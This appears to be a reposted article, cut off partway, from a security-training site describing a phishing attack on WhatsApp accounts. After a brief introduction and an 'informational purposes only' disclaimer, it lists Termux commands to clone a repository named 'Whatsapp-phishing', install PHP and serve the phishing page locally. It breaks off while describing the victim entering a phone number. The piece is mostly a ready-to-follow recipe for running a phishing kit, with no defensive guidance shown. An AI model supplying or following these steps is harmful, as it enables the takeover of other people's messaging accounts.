Phishing is one of the main cybersecurity threats today, since virtually anyone in the world uses smartphones, online accounts and other tools despite not having basic notions of computer security and security risks, say specialists in ethical hacking.
A growing trend within phishing is the compromise of WhatsApp accounts, the largest instant messaging platform in the world. Threat actors take advantage of the fact that minimal resources are required for the deployment of a phishing campaign against users of the application, using tools available in any forum of dubious reputation.
This time, the ethical hacking experts of the International Institute of Cyber Security (IICS) will show you a simple phishing attack to attack WhatsApp accounts, using just a few commands. As usual, we remind you that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.
This attack is based on Termux, the popular terminal emulator for Android devices that allows you to run a Linux environment on a smartphone with specific requirements. Once we have installed Termux, we will have to open the tool and write the following commands one by one (enter “y” when the system asks to choose between Y/N):
apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080
Next, experts in ethical hacking recommend typing in the browser the following command:
http://localhost:8080
The victim enters a number, for example:
< ..
Support the originator by clicking the read the rest link below.
